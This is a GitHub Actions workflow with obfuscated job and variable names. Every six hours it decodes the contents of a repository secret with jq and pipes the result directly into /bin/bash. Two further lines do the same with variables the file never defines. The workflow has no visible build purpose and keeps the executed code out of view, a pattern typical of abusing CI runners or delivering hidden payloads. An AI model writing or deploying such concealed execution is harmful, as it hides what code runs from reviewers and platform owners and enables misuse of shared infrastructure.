name: wangguorong7164

on:
  workflow_dispatch:
  schedule:
    - cron: '33 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wangguorong7164
        env:
          gt97259: ${{ secrets.gt97259 }}
        run: |
          echo $gt97259 | jq -r .r1807 | /bin/bash
          echo $xhzhc59 | jq -r .yzvh799 | /bin/bash
          echo $qy12 | jq -r .etjd4359 | /bin/bash

